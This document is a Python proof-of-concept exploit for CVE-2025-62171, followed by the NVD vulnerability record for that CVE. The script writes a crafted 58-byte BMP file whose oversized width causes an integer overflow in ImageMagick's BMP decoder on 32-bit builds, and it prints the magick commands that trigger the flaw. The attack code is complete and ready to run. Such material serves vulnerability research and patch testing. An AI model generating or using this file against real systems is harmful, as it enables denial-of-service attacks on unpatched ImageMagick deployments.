CVE-2025-62171

#!/usr/bin/env python3 """ CVE-2025-62171 PoC - ImageMagick BMP Decoder Integer Overflow Generates a malicious 58-byte BMP file that triggers integer overflow in ImageMagick's BMP decoder on 32-bit systems. """ import struct def create_malicious_bmp(filename="cve_2025_62171.bmp"): # BMP File Header (14 bytes) signature = b'BM' # Magic number file_size = 58 # Total file size (58 bytes) reserved1 = 0 # Reserved field reserved2 = 0 # Reserved field pixel_offset = 54 # Offset to pixel data (14 + 40) bmp_header = struct.pack('<2sIHHI', signature, file_size, reserved1, reserved2, pixel_offset) # DIB Header - BITMAPINFOHEADER (40 bytes) header_size = 40 # DIB header size width = 536870912 # 0x20000000 - triggers overflow with 32bpp height = 1 # Minimal height planes = 1 # Number of color planes bits_per_pixel = 32 # 32 bits per pixel compression = 0 # No compression (BI_RGB) image_size = 0 # Can be 0 for BI_RGB x_pixels_per_meter = 0 # Horizontal resolution y_pixels_per_meter = 0 # Vertical resolution colors_used = 0 # Number of colors in palette important_colors = 0 # Important colors dib_header = struct.pack('<IiiHHIIiiII', header_size, width, height, planes, bits_per_pixel, compression, image_size, x_pixels_per_meter, y_pixels_per_meter, colors_used, important_colors) # Pixel data (4 bytes to reach total 58 bytes) pixel_data = b'\x00\x00\x00\x00' # Combine all parts bmp_data = bmp_header + dib_header + pixel_data assert len(bmp_data) == 58, f"Expected 58 bytes, got {len(bmp_data)}" with open(filename, 'wb') as f: f.write(bmp_data) print(f"[+] Malicious BMP file created: {filename}") print(f"[+] File size: {len(bmp_data)} bytes") print(f"[+] Width: {width} (0x{width:08X})") print(f"[+] Bits per pixel: {bits_per_pixel}") print(f"[+] Overflow calculation: {width} * {bits_per_pixel} = {width * bits_per_pixel}") print(f"[+] On 32-bit system: wraps to {(width * bits_per_pixel) % (2**32)}") print() print("[*] To trigger the vulnerability:") print(f" magick identify {filename}") print(f" magick convert {filename} /tmp/output.png") if __name__ == "__main__": create_malicious_bmp()

{"cve": {"id": "CVE-2025-62171", "sourceIdentifier": "[email protected]", "published": "2025-10-17T17:15:49.197", "lastModified": "2025-11-03T18:17:01.650", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "ImageMagick is an open source software suite for displaying, converting, and editing raster image files. In ImageMagick versions prior to 7.1.2-7 and 6.9.13-32, an integer overflow vulnerability exists in the BMP decoder on 32-bit systems. The vulnerability occurs in coders/bmp.c when calculating the extent value by multiplying image columns by bits per pixel. On 32-bit systems with size_t of 4 bytes, a malicious BMP file with specific dimensions can cause this multiplication to overflow and wrap to zero. The overflow check added to address CVE-2025-57803 is placed after the overflow occurs, making it ineffective. A specially crafted 58-byte BMP file with width set to 536,870,912 and 32 bits per pixel can trigger this overflow, causing the bytes_per_line calculation to become zero. This vulnerability only affects 32-bit builds of ImageMagick where default resource limits for width, height, and area have been manually increased beyond their defaults. 64-bit systems with size_t of 8 bytes are not vulnerable, and systems using default ImageMagick resource limits are not vulnerable. The vulnerability is fixed in versions 7.1.2-7 and 6.9.13-32."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-190"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:imagemagick:imagemagick:*:*:*:*:*:*:*:*", "versionEndExcluding": "6.9.13-32", "matchCriteriaId": "EB78F6C2-7C33-4A0A-A093-6A26A8B9C3BF"}, {"vulnerable": true, "criteria": "cpe:2.3:a:imagemagick:imagemagick:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.0.0-0", "versionEndExcluding": "7.1.2-7", "matchCriteriaId": "5F3152BE-0219-45B9-940F-86EED0E01510"}]}]}], "references": [{"url": "https://github.com/ImageMagick/ImageMagick/commit/cea1693e2ded51b4cc91c70c54096cbed1691c00", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-9pp9-cfwx-54rm", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://lists.debian.org/debian-lts-announce/2025/10/msg00019.html", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}